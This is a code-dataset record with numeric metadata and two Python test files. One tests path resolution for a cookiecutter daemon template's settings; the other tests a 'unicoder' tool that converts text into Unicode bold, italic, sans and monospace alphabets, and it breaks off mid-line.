23.333333
43
0.714286
25
140
3.96
0.72
0
0
0
0
0
0
0
0
0
0
0.069565
0.178571
140
6
43
23.333333
0.791304
0.207143
0
0
0
0
0
0
0
0
0
0
0
1
0.25
true
0
0.5
0.25
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
1
1
1
0
0
7
1fc6c49c7b60cc931757a385d4a2e4eaa1b1c494
13,830
py
Python
{{cookiecutter.project_slug}}/tests/settings_spec.py
tadams42/cookiecutter_python_linux_daemon
efc15cbafa64a9fe70d7c4b69641b6550cc9c82b
[ "MIT" ]
null
null
null
{{cookiecutter.project_slug}}/tests/settings_spec.py
tadams42/cookiecutter_python_linux_daemon
efc15cbafa64a9fe70d7c4b69641b6550cc9c82b
[ "MIT" ]
null
null
null
{{cookiecutter.project_slug}}/tests/settings_spec.py
tadams42/cookiecutter_python_linux_daemon
efc15cbafa64a9fe70d7c4b69641b6550cc9c82b
[ "MIT" ]
null
null
null
import os

import pytest
import simplejson as json
from pkg_resources import Requirement, resource_filename

from {{cookiecutter.project_slug}}.settings import ENVIRONMENTS, ImproperlyConfiguredError


class DescribeDevelopmentConfigLoader:
    def it_resolves_to_correct_default_config_paths(self):
        cfg = ENVIRONMENTS["development"]()
        # Prevent logging config from loading
        cfg._logging_json = {"handlers": {"file": {"filename": None}}}

        cfg._IS_RUNNING_FROM_SOURCE = True
        assert cfg.config_file_abspaths == [
            os.path.join(cfg._REPO_ROOT, "config", "development.yaml")
        ]
        assert cfg.filelog_abspath == os.path.join(
            cfg._REPO_ROOT, "log", "development.log"
        )
        assert cfg.logging_config_abspaths == [
            os.path.join(cfg._REPO_ROOT, "config", "logging_config.json")
        ]

        cfg._IS_RUNNING_FROM_SOURCE = False
        assert cfg.config_file_abspaths == [
            resource_filename(
                Requirement.parse("{{cookiecutter.project_slug}}"),
                "{{cookiecutter.project_slug}}/resources/development.yaml",
            )
        ]
        assert cfg.filelog_abspath == os.path.join(
            cfg.DEFAULT_TEMP_DIR, "development.log"
        )
        assert cfg.logging_config_abspaths == [
            resource_filename(
                Requirement.parse("{{cookiecutter.project_slug}}"),
                "{{cookiecutter.project_slug}}/resources/logging_config.json",
            )
        ]

    def it_accepts_absolute_paths_for_cmdline_arguments(self, mocker):
        absolute_paths = mocker.Mock()
        absolute_paths.config_file_path = "/absolute/path/config_file.yaml"
        absolute_paths.log_file_path = "/absolute/path/log_file.log"
        absolute_paths.logging_config_path = "/absolute/path/logging_config.json"

        cfg = ENVIRONMENTS["development"](absolute_paths)
        # Prevent logging config from loading
        cfg._logging_json = {"handlers": {"file": {"filename": None}}}

        cfg._IS_RUNNING_FROM_SOURCE = True
        assert cfg.config_file_abspaths == [absolute_paths.config_file_path]
        assert cfg.filelog_abspath == absolute_paths.log_file_path
        assert cfg.logging_config_abspaths == [absolute_paths.logging_config_path]

        cfg._IS_RUNNING_FROM_SOURCE = False
        assert cfg.config_file_abspaths == [absolute_paths.config_file_path]
        assert cfg.filelog_abspath == absolute_paths.log_file_path
        assert cfg.logging_config_abspaths == [absolute_paths.logging_config_path]

        cfg = ENVIRONMENTS["development"]()
        cfg._logging_json = {"handlers": {"file": {"filename": "/foo/bar.json"}}}
        assert cfg.filelog_abspath == "/foo/bar.json"

    def it_raises_if_it_gets_relative_paths_for_cmdline_arguments(self, mocker):
        relative_paths = mocker.Mock()
        relative_paths.config_file_path = "relative/path/config_file.yaml"
        relative_paths.log_file_path = "relative/path/log_file.log"
        relative_paths.logging_config_path = "relative/path/logging_config.json"

        cfg = ENVIRONMENTS["development"](relative_paths)
        # Prevent logging config from loading
        cfg._logging_json = {"handlers": {"file": {"filename": None}}}

        cfg._IS_RUNNING_FROM_SOURCE = True
        with pytest.raises(ImproperlyConfiguredError):
            cfg.config_file_abspaths
        with pytest.raises(ImproperlyConfiguredError):
            cfg.logging_config_abspaths
        with pytest.raises(ImproperlyConfiguredError):
            cfg.filelog_abspath

        cfg._IS_RUNNING_FROM_SOURCE = False
        with pytest.raises(ImproperlyConfiguredError):
            cfg.config_file_abspaths
        with pytest.raises(ImproperlyConfiguredError):
            cfg.logging_config_abspaths
        with pytest.raises(ImproperlyConfiguredError):
            cfg.filelog_abspath


class DescribeTestConfigLoader:
    def it_resolves_to_correct_default_config_paths(self):
        cfg = ENVIRONMENTS["test"]()
        # Prevent logging config from loading
        cfg._logging_json = {"handlers": {"file": {"filename": None}}}

        cfg._IS_RUNNING_FROM_SOURCE = True
        assert cfg.config_file_abspaths == [
            os.path.join(cfg._REPO_ROOT, "config", "test.yaml")
        ]
        assert cfg.filelog_abspath == os.path.join(cfg._REPO_ROOT, "log", "test.log")
        assert cfg.logging_config_abspaths == [
            os.path.join(cfg._REPO_ROOT, "config", "logging_config.json")
        ]

        cfg._IS_RUNNING_FROM_SOURCE = False
        assert cfg.config_file_abspaths == [
            resource_filename(
                Requirement.parse("{{cookiecutter.project_slug}}"),
                "{{cookiecutter.project_slug}}/resources/test.yaml",
            )
        ]
        assert cfg.filelog_abspath == os.path.join(cfg.DEFAULT_TEMP_DIR, "test.log")
        assert cfg.logging_config_abspaths == [
            resource_filename(
                Requirement.parse("{{cookiecutter.project_slug}}"),
                "{{cookiecutter.project_slug}}/resources/logging_config.json",
            )
        ]

    def it_accepts_absolute_paths_for_cmdline_arguments(self, mocker):
        absolute_paths = mocker.Mock()
        absolute_paths.config_file_path = "/absolute/path/config_file.yaml"
        absolute_paths.log_file_path = "/absolute/path/log_file.log"
        absolute_paths.logging_config_path = "/absolute/path/logging_config.json"

        cfg = ENVIRONMENTS["test"](absolute_paths)
        # Prevent logging config from loading
        cfg._logging_json = {"handlers": {"file": {"filename": None}}}

        cfg._IS_RUNNING_FROM_SOURCE = True
        assert cfg.config_file_abspaths == [absolute_paths.config_file_path]
        assert cfg.filelog_abspath == absolute_paths.log_file_path
        assert cfg.logging_config_abspaths == [absolute_paths.logging_config_path]

        cfg._IS_RUNNING_FROM_SOURCE = False
        assert cfg.config_file_abspaths == [absolute_paths.config_file_path]
        assert cfg.filelog_abspath == absolute_paths.log_file_path
        assert cfg.logging_config_abspaths == [absolute_paths.logging_config_path]

        cfg = ENVIRONMENTS["test"]()
        cfg._logging_json = {"handlers": {"file": {"filename": "/foo/bar.json"}}}
        assert cfg.filelog_abspath == "/foo/bar.json"

    def it_raises_if_it_gets_relative_paths_for_cmdline_arguments(self, mocker):
        relative_paths = mocker.Mock()
        relative_paths.config_file_path = "relative/path/config_file.yaml"
        relative_paths.log_file_path = "relative/path/log_file.log"
        relative_paths.logging_config_path = "relative/path/logging_config.json"

        cfg = ENVIRONMENTS["test"](relative_paths)
        # Prevent logging config from loading
        cfg._logging_json = {"handlers": {"file": {"filename": None}}}

        cfg._IS_RUNNING_FROM_SOURCE = True
        with pytest.raises(ImproperlyConfiguredError):
            cfg.config_file_abspaths
        with pytest.raises(ImproperlyConfiguredError):
            cfg.logging_config_abspaths
        with pytest.raises(ImproperlyConfiguredError):
            cfg.filelog_abspath

        cfg._IS_RUNNING_FROM_SOURCE = False
        with pytest.raises(ImproperlyConfiguredError):
            cfg.config_file_abspaths
        with pytest.raises(ImproperlyConfiguredError):
            cfg.logging_config_abspaths
        with pytest.raises(ImproperlyConfiguredError):
            cfg.filelog_abspath


class DescribeProductionConfigLoader:
    def it_resolves_to_correct_default_config_paths(self, mocker):
        cfg = ENVIRONMENTS["production"]()
        # Prevent logging config from loading
        cfg._logging_json = {"handlers": {"file": {"filename": None}}}

        cfg._IS_RUNNING_FROM_SOURCE = True
        assert cfg.config_file_abspaths == [
            "/etc/{{cookiecutter.project_slug}}/production.yaml",
            "/etc/{{cookiecutter.project_slug}}/production.yml",
            "/etc/{{cookiecutter.project_slug}}/app.yaml",
            "/etc/{{cookiecutter.project_slug}}/app.yml",
            os.path.join(cfg.XDG_CONFIG_HOME, "production.yaml"),
            os.path.join(cfg.XDG_CONFIG_HOME, "production.yml"),
            os.path.join(cfg.XDG_CONFIG_HOME, "app.yaml"),
            os.path.join(cfg.XDG_CONFIG_HOME, "app.yml"),
        ]
        assert cfg.filelog_abspath == os.path.join(cfg.XDG_DATA_HOME, "production.log")
        assert cfg.logging_config_abspaths == [
            "/etc/{{cookiecutter.project_slug}}/logging_config.json",
            os.path.join(cfg.XDG_CONFIG_HOME, "logging_config.json"),
        ]

        cfg._IS_RUNNING_FROM_SOURCE = False
        cfg._logging_json = {"handlers": {"file": {"filename": None}}}
        assert cfg.config_file_abspaths == [
            "/etc/{{cookiecutter.project_slug}}/production.yaml",
            "/etc/{{cookiecutter.project_slug}}/production.yml",
            "/etc/{{cookiecutter.project_slug}}/app.yaml",
            "/etc/{{cookiecutter.project_slug}}/app.yml",
            os.path.join(cfg.XDG_CONFIG_HOME, "production.yaml"),
            os.path.join(cfg.XDG_CONFIG_HOME, "production.yml"),
            os.path.join(cfg.XDG_CONFIG_HOME, "app.yaml"),
            os.path.join(cfg.XDG_CONFIG_HOME, "app.yml"),
        ]
        assert cfg.filelog_abspath == os.path.join(cfg.XDG_DATA_HOME, "production.log")
        assert cfg.logging_config_abspaths == [
            "/etc/{{cookiecutter.project_slug}}/logging_config.json",
            os.path.join(cfg.XDG_CONFIG_HOME, "logging_config.json"),
        ]

    def it_resolves_to_correct_config_paths_when_relative_override_given(self, mocker):
        cmdline_args = mocker.Mock()
        cmdline_args.config_file_path = "relative/path/config_file.yaml"
        cmdline_args.log_file_path = "relative/path/log_file.log"
        cmdline_args.logging_config_path = "relative/path/logging_config.json"

        cfg = ENVIRONMENTS["production"](cmdline_args)
        # Prevent logging config from loading
        cfg._logging_json = {"handlers": {"file": {"filename": None}}}

        cfg._IS_RUNNING_FROM_SOURCE = True
        assert cfg.config_file_abspaths == [
            os.path.join(cfg._REPO_ROOT, cmdline_args.config_file_path)
        ]
        assert cfg.filelog_abspath == os.path.join(
            cfg._REPO_ROOT, cmdline_args.log_file_path
        )
        assert cfg.logging_config_abspaths == [
            os.path.join(cfg._REPO_ROOT, cmdline_args.logging_config_path)
        ]

        cfg._IS_RUNNING_FROM_SOURCE = False
        cfg._logging_json = {"handlers": {"file": {"filename": None}}}
        assert cfg.config_file_abspaths == [
            os.path.join(cfg.XDG_CONFIG_HOME, cmdline_args.config_file_path)
        ]
        assert cfg.filelog_abspath == os.path.join(
            cfg.XDG_DATA_HOME, cmdline_args.log_file_path
        )
        assert cfg.logging_config_abspaths == [
            os.path.join(cfg.XDG_CONFIG_HOME, cmdline_args.logging_config_path)
        ]

        cfg = ENVIRONMENTS["production"]()
        cfg._IS_RUNNING_FROM_SOURCE = True
        cfg._logging_json = {"handlers": {"file": {"filename": "foo/bar.json"}}}
        assert cfg.filelog_abspath == os.path.join(cfg._REPO_ROOT, "foo/bar.json")
        cfg._IS_RUNNING_FROM_SOURCE = False
        cfg._logging_json = {"handlers": {"file": {"filename": "foo/bar.json"}}}
        assert cfg.filelog_abspath == os.path.join(cfg.XDG_DATA_HOME, "foo/bar.json")

    def it_resolves_to_correct_config_paths_when_absolute_override_given(self, mocker):
        cmdline_args = mocker.Mock()
        cmdline_args.config_file_path = "/absolute/path/config_file.yaml"
        cmdline_args.log_file_path = "/absolute/path/log_file.log"
        cmdline_args.logging_config_path = "/absolute/path/logging_config.json"

        cfg = ENVIRONMENTS["production"](cmdline_args)
        # Prevent logging config from loading
        cfg._logging_json = {"handlers": {"file": {"filename": None}}}

        cfg._IS_RUNNING_FROM_SOURCE = True
        assert cfg.config_file_abspaths == [cmdline_args.config_file_path]
        assert cfg.filelog_abspath == cmdline_args.log_file_path
        assert cfg.logging_config_abspaths == [cmdline_args.logging_config_path]

        cfg._IS_RUNNING_FROM_SOURCE = False
        cfg._logging_json = {"handlers": {"file": {"filename": None}}}
        assert cfg.config_file_abspaths == [cmdline_args.config_file_path]
        assert cfg.filelog_abspath == cmdline_args.log_file_path
        assert cfg.logging_config_abspaths == [cmdline_args.logging_config_path]

        cfg = ENVIRONMENTS["production"]()
        cfg._IS_RUNNING_FROM_SOURCE = True
        cfg._logging_json = {"handlers": {"file": {"filename": "/foo/bar.json"}}}
        assert cfg.filelog_abspath == os.path.join("/foo/bar.json")
        cfg._IS_RUNNING_FROM_SOURCE = False
        cfg._logging_json = {"handlers": {"file": {"filename": "/foo/bar.json"}}}
        assert cfg.filelog_abspath == os.path.join("/foo/bar.json")

    def it_loads_bundled_loging_config_if_no_external_files_exist(self, mocker):
        mocker.patch.object(
            ENVIRONMENTS["production"],
            "logging_config_abspaths",
            new_callable=mocker.PropertyMock,
            return_value=["/foo"],
        )
        cfg = ENVIRONMENTS["production"]()
        with open(
            resource_filename(
                Requirement("{{cookiecutter.project_slug}}"),
                "{{cookiecutter.project_slug}}/resources/logging_config.json",
            ),
            "r",
        ) as f:
            expected = json.load(f)

        assert cfg.logging_config_abspaths == ["/foo"]
        cfg._load_logging_config()
        assert cfg._logging_json == expected
44.469453
119
0.663702
1,575
13,830
5.475556
0.064762
0.088938
0.034787
0.042208
0.927296
0.922542
0.922542
0.915584
0.911874
0.882653
0
0
0.223933
13,830
310
120
44.612903
0.803503
0.023355
0
0.694444
0
0
0.17878
0.108839
0
0
0
0
0.198413
0
null
null
0
0.019841
null
null
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
7
1fdfbc03828e86ecd6308d16f2e9bdb61fdf10d3
64,439
py
Python
unicoder.py.tests.py
gdraheim/unicoder
4e8a89d1fd14ae2e88090d719cb05cfb81a0e851
[ "Apache-2.0" ]
null
null
null
unicoder.py.tests.py
gdraheim/unicoder
4e8a89d1fd14ae2e88090d719cb05cfb81a0e851
[ "Apache-2.0" ]
null
null
null
unicoder.py.tests.py
gdraheim/unicoder
4e8a89d1fd14ae2e88090d719cb05cfb81a0e851
[ "Apache-2.0" ]
null
null
null
#! /usr/bin/python3 """ testing the unicoder.py functions """ import sys, os import unittest import logging from fnmatch import fnmatchcase as fnmatch import unicoder logg = logging.getLogger("TEST") base_abcdefghijklmnopqrstuvwxyz = ":abcdefghijklmnopqrstuvwxyz" base_ABCDEFGHIJKLMNOPQRSTUVWXYZ = ":ABCDEFGHIJKLMNOPQRSTUVWXYZ" mono_abcdefghijklmnopqrstuvwxyz = ":𝚊𝚋𝚌𝚍𝚎𝚏𝚐𝚑𝚒𝚓𝚔𝚕𝚖𝚗𝚘𝚙𝚚𝚛𝚜𝚝𝚞𝚟𝚠𝚡𝚢𝚣" mono_ABCDEFGHIJKLMNOPQRSTUVWXYZ = ":𝙰𝙱𝙲𝙳𝙴𝙵𝙶𝙷𝙸𝙹𝙺𝙻𝙼𝙽𝙾𝙿𝚀𝚁𝚂𝚃𝚄𝚅𝚆𝚇𝚈𝚉" sans_abcdefghijklmnopqrstuvwxyz = ":𝖺𝖻𝖼𝖽𝖾𝖿𝗀𝗁𝗂𝗃𝗄𝗅𝗆𝗇𝗈𝗉𝗊𝗋𝗌𝗍𝗎𝗏𝗐𝗑𝗒𝗓" sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ = ":𝖠𝖡𝖢𝖣𝖤𝖥𝖦𝖧𝖨𝖩𝖪𝖫𝖬𝖭𝖮𝖯𝖰𝖱𝖲𝖳𝖴𝖵𝖶𝖷𝖸𝖹" base_0123456789 = ":0123456789" mono_0123456789 = ":𝟶𝟷𝟸𝟹𝟺𝟻𝟼𝟽𝟾𝟿" sans_0123456789 = ":𝟢𝟣𝟤𝟥𝟦𝟧𝟨𝟩𝟪𝟫" bold_sans_abcdefghijklmnopqrstuvwxyz = ":𝗮𝗯𝗰𝗱𝗲𝗳𝗴𝗵𝗶𝗷𝗸𝗹𝗺𝗻𝗼𝗽𝗾𝗿𝘀𝘁𝘂𝘃𝘄𝘅𝘆𝘇" bold_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ = ":𝗔𝗕𝗖𝗗𝗘𝗙𝗚𝗛𝗜𝗝𝗞𝗟𝗠𝗡𝗢𝗣𝗤𝗥𝗦𝗧𝗨𝗩𝗪𝗫𝗬𝗭" bold_sans_0123456789 = ":𝟬𝟭𝟮𝟯𝟰𝟱𝟲𝟳𝟴𝟵" ital_sans_abcdefghijklmnopqrstuvwxyz = ":𝘢𝘣𝘤𝘥𝘦𝘧𝘨𝘩𝘪𝘫𝘬𝘭𝘮𝘯𝘰𝘱𝘲𝘳𝘴𝘵𝘶𝘷𝘸𝘹𝘺𝘻" ital_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ = ":𝘈𝘉𝘊𝘋𝘌𝘍𝘎𝘏𝘐𝘑𝘒𝘓𝘔𝘕𝘖𝘗𝘘𝘙𝘚𝘛𝘜𝘝𝘞𝘟𝘠𝘡" ital_sans_0123456789 = ":𝟢𝟣𝟤𝟥𝟦𝟧𝟨𝟩𝟪𝟫" # aka sans bold_ital_sans_abcdefghijklmnopqrstuvwxyz = ":𝙖𝙗𝙘𝙙𝙚𝙛𝙜𝙝𝙞𝙟𝙠𝙡𝙢𝙣𝙤𝙥𝙦𝙧𝙨𝙩𝙪𝙫𝙬𝙭𝙮𝙯" bold_ital_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ = ":𝘼𝘽𝘾𝘿𝙀𝙁𝙂𝙃𝙄𝙅𝙆𝙇𝙈𝙉𝙊𝙋𝙌𝙍𝙎𝙏𝙐𝙑𝙒𝙓𝙔𝙕" bold_ital_sans_0123456789 = ":𝟬𝟭𝟮𝟯𝟰𝟱𝟲𝟳𝟴𝟵" # aka bold_sans class UnicoderTest(unittest.TestCase): def test_001_opt_scan(self) -> None: opt = unicoder.scan(["-v"]) self.assertEqual(opt.verbose, 1) def test_002_opt_scan(self) -> None: opt = unicoder.scan(["-vv"]) self.assertEqual(opt.verbose, 2) def test_003_opt_scan(self) -> None: opt = unicoder.scan(["-v", "-vv"]) self.assertEqual(opt.verbose, 3) def test_005_opt_scan(self) -> None: opt = unicoder.scan(["--verbose"]) self.assertEqual(opt.verbose, 1) def test_006_opt_scan(self) -> None: opt = unicoder.scan(["--verbose", "--verbose"]) self.assertEqual(opt.verbose, 2) def test_007_opt_scan(self) -> None: opt = unicoder.scan(["--verbose", "--verbose", "-vv"]) self.assertEqual(opt.verbose, 4) def test_008_opt_scan(self) -> None: opt = unicoder.scan(["--verbose", "-vv", "--verbose"]) self.assertEqual(opt.verbose, 4) def test_009_opt_scan(self) -> None: opt = unicoder.scan(["-vv", "--verbose", "--verbose"]) self.assertEqual(opt.verbose, 4) def test_011_opt_scan(self) -> None: opt = unicoder.scan(["-h"]) self.assertEqual(opt.helpinfo, 1) def test_012_opt_scan(self) -> None: opt = unicoder.scan(["-hh"]) self.assertEqual(opt.helpinfo, 2) def test_013_opt_scan(self) -> None: opt = unicoder.scan(["-hh", "--help"]) self.assertEqual(opt.helpinfo, 3) def test_014_opt_scan(self) -> None: opt = unicoder.scan(["-hh", "--help", "arg1"]) self.assertEqual(opt.helpinfo, 3) self.assertEqual(opt.cmd, "arg1") self.assertEqual(opt.text, "") def test_015_opt_scan(self) -> None: opt = unicoder.scan(["-hh", "--help", "arg1", "arg2"]) self.assertEqual(opt.helpinfo, 3) self.assertEqual(opt.cmd, "arg1") self.assertEqual(opt.text, "arg2") def test_016_opt_scan(self) -> None: opt = unicoder.scan(["-hh", "--help", "arg1", "arg2", "--arg3"]) self.assertEqual(opt.helpinfo, 3) self.assertEqual(opt.cmd, "arg1") self.assertEqual(opt.text, "arg2 --arg3") def test_017_opt_scan(self) -> None: opt = unicoder.scan(["-hh", "--help", "arg1", "--arg2", "arg3"]) self.assertEqual(opt.helpinfo, 3) self.assertEqual(opt.cmd, "arg1") self.assertEqual(opt.text, "--arg2 arg3") def test_018_opt_scan(self) -> None: opt = unicoder.scan(["-hh", "--help", "--arg1", "arg2", "arg3"]) self.assertEqual(opt.helpinfo, 3) self.assertEqual(opt.cmd, "arg2") self.assertEqual(opt.text, "arg3") def test_019_opt_scan(self) -> None: opt = 
unicoder.scan(["-hh", "--help", "-&", "arg2", "arg3"]) self.assertEqual(opt.helpinfo, 3) self.assertEqual(opt.cmd, "arg2") self.assertEqual(opt.text, "arg3") def test_051_helpinfo(self) -> None: text = unicoder.helpinfo() self.assertIn("futark", text) self.assertIn("italboldgreek", text) # def test_110_bold_base(self) -> None: uni = unicoder.convert("fix", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, base_abcdefghijklmnopqrstuvwxyz) def test_111_bold_base(self) -> None: uni = unicoder.convert("fat", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝐚𝐛𝐜𝐝𝐞𝐟𝐠𝐡𝐢𝐣𝐤𝐥𝐦𝐧𝐨𝐩𝐪𝐫𝐬𝐭𝐮𝐯𝐰𝐱𝐲𝐳") def test_112_bold_base(self) -> None: uni = unicoder.convert("bold", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝐚𝐛𝐜𝐝𝐞𝐟𝐠𝐡𝐢𝐣𝐤𝐥𝐦𝐧𝐨𝐩𝐪𝐫𝐬𝐭𝐮𝐯𝐰𝐱𝐲𝐳") def test_113_bold_base(self) -> None: uni = unicoder.convert("fat", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝐀𝐁𝐂𝐃𝐄𝐅𝐆𝐇𝐈𝐉𝐊𝐋𝐌𝐍𝐎𝐏𝐐𝐑𝐒𝐓𝐔𝐕𝐖𝐗𝐘𝐙") def test_114_bold_base(self) -> None: uni = unicoder.convert("bold", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝐀𝐁𝐂𝐃𝐄𝐅𝐆𝐇𝐈𝐉𝐊𝐋𝐌𝐍𝐎𝐏𝐐𝐑𝐒𝐓𝐔𝐕𝐖𝐗𝐘𝐙") def test_115_bold_base(self) -> None: uni = unicoder.bold(base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝐚𝐛𝐜𝐝𝐞𝐟𝐠𝐡𝐢𝐣𝐤𝐥𝐦𝐧𝐨𝐩𝐪𝐫𝐬𝐭𝐮𝐯𝐰𝐱𝐲𝐳") def test_116_bold_base(self) -> None: uni = unicoder.bold(base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝐚𝐛𝐜𝐝𝐞𝐟𝐠𝐡𝐢𝐣𝐤𝐥𝐦𝐧𝐨𝐩𝐪𝐫𝐬𝐭𝐮𝐯𝐰𝐱𝐲𝐳") def test_117_bold_base(self) -> None: uni = unicoder.bold(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝐀𝐁𝐂𝐃𝐄𝐅𝐆𝐇𝐈𝐉𝐊𝐋𝐌𝐍𝐎𝐏𝐐𝐑𝐒𝐓𝐔𝐕𝐖𝐗𝐘𝐙") def test_118_bold_base(self) -> None: uni = unicoder.bold(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝐀𝐁𝐂𝐃𝐄𝐅𝐆𝐇𝐈𝐉𝐊𝐋𝐌𝐍𝐎𝐏𝐐𝐑𝐒𝐓𝐔𝐕𝐖𝐗𝐘𝐙") def test_120_ital_base(self) -> None: uni = unicoder.convert("fix", ":abcdefg-ijklmnopqrstuvwxyz") self.assertEqual(uni, ":abcdefg-ijklmnopqrstuvwxyz") uni = unicoder.convert("fix", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":abcdefghijklmnopqrstuvwxyz") def test_121_ital_base(self) -> None: uni = unicoder.convert("slant", ":abcdefg-ijklmnopqrstuvwxyz") self.assertEqual(uni, ":𝑎𝑏𝑐𝑑𝑒𝑓𝑔-𝑖𝑗𝑘𝑙𝑚𝑛𝑜𝑝𝑞𝑟𝑠𝑡𝑢𝑣𝑤𝑥𝑦𝑧") uni = unicoder.convert("slant", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝑎𝑏𝑐𝑑𝑒𝑓𝑔ℎ𝑖𝑗𝑘𝑙𝑚𝑛𝑜𝑝𝑞𝑟𝑠𝑡𝑢𝑣𝑤𝑥𝑦𝑧") def test_122_ital_base(self) -> None: uni = unicoder.convert("ital", ":abcdefg-ijklmnopqrstuvwxyz") self.assertEqual(uni, ":𝑎𝑏𝑐𝑑𝑒𝑓𝑔-𝑖𝑗𝑘𝑙𝑚𝑛𝑜𝑝𝑞𝑟𝑠𝑡𝑢𝑣𝑤𝑥𝑦𝑧") uni = unicoder.convert("ital", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝑎𝑏𝑐𝑑𝑒𝑓𝑔ℎ𝑖𝑗𝑘𝑙𝑚𝑛𝑜𝑝𝑞𝑟𝑠𝑡𝑢𝑣𝑤𝑥𝑦𝑧") def test_123_ital_base(self) -> None: uni = unicoder.convert("slant", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝐴𝐵𝐶𝐷𝐸𝐹𝐺𝐻𝐼𝐽𝐾𝐿𝑀𝑁𝑂𝑃𝑄𝑅𝑆𝑇𝑈𝑉𝑊𝑋𝑌𝑍") def test_124_ital_base(self) -> None: uni = unicoder.convert("ital", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝐴𝐵𝐶𝐷𝐸𝐹𝐺𝐻𝐼𝐽𝐾𝐿𝑀𝑁𝑂𝑃𝑄𝑅𝑆𝑇𝑈𝑉𝑊𝑋𝑌𝑍") def test_125_ital_base(self) -> None: uni = unicoder.ital(":abcdefg-ijklmnopqrstuvwxyz") self.assertEqual(uni, ":𝑎𝑏𝑐𝑑𝑒𝑓𝑔-𝑖𝑗𝑘𝑙𝑚𝑛𝑜𝑝𝑞𝑟𝑠𝑡𝑢𝑣𝑤𝑥𝑦𝑧") uni = unicoder.ital(base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝑎𝑏𝑐𝑑𝑒𝑓𝑔ℎ𝑖𝑗𝑘𝑙𝑚𝑛𝑜𝑝𝑞𝑟𝑠𝑡𝑢𝑣𝑤𝑥𝑦𝑧") def test_126_ital_base(self) -> None: uni = unicoder.ital(":abcdefg-ijklmnopqrstuvwxyz") self.assertEqual(uni, ":𝑎𝑏𝑐𝑑𝑒𝑓𝑔-𝑖𝑗𝑘𝑙𝑚𝑛𝑜𝑝𝑞𝑟𝑠𝑡𝑢𝑣𝑤𝑥𝑦𝑧") uni = unicoder.ital(base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝑎𝑏𝑐𝑑𝑒𝑓𝑔ℎ𝑖𝑗𝑘𝑙𝑚𝑛𝑜𝑝𝑞𝑟𝑠𝑡𝑢𝑣𝑤𝑥𝑦𝑧") def test_127_ital_base(self) -> None: uni = unicoder.ital(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝐴𝐵𝐶𝐷𝐸𝐹𝐺𝐻𝐼𝐽𝐾𝐿𝑀𝑁𝑂𝑃𝑄𝑅𝑆𝑇𝑈𝑉𝑊𝑋𝑌𝑍") def test_128_ital_base(self) -> None: uni = unicoder.ital(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝐴𝐵𝐶𝐷𝐸𝐹𝐺𝐻𝐼𝐽𝐾𝐿𝑀𝑁𝑂𝑃𝑄𝑅𝑆𝑇𝑈𝑉𝑊𝑋𝑌𝑍") def 
test_130_bold_ital_base(self) -> None: uni = unicoder.convert("fix", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, base_abcdefghijklmnopqrstuvwxyz) def test_131_ital_bold_base(self) -> None: uni = unicoder.convert("fatslant", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛") def test_132_ital_bold_base(self) -> None: uni = unicoder.convert("italbold", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛") def test_133_ital_bold_base(self) -> None: uni = unicoder.convert("fatslant", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝑨𝑩𝑪𝑫𝑬𝑭𝑮𝑯𝑰𝑱𝑲𝑳𝑴𝑵𝑶𝑷𝑸𝑹𝑺𝑻𝑼𝑽𝑾𝑿𝒀𝒁") def test_134_ital_bold_base(self) -> None: uni = unicoder.convert("italbold", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝑨𝑩𝑪𝑫𝑬𝑭𝑮𝑯𝑰𝑱𝑲𝑳𝑴𝑵𝑶𝑷𝑸𝑹𝑺𝑻𝑼𝑽𝑾𝑿𝒀𝒁") def test_136_ital_bold_base(self) -> None: uni = unicoder.ital(unicoder.bold(base_abcdefghijklmnopqrstuvwxyz)) self.assertEqual(uni, ":𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛") def test_137_ital_bold_base(self) -> None: uni = unicoder.ital(unicoder.bold(base_abcdefghijklmnopqrstuvwxyz)) self.assertEqual(uni, 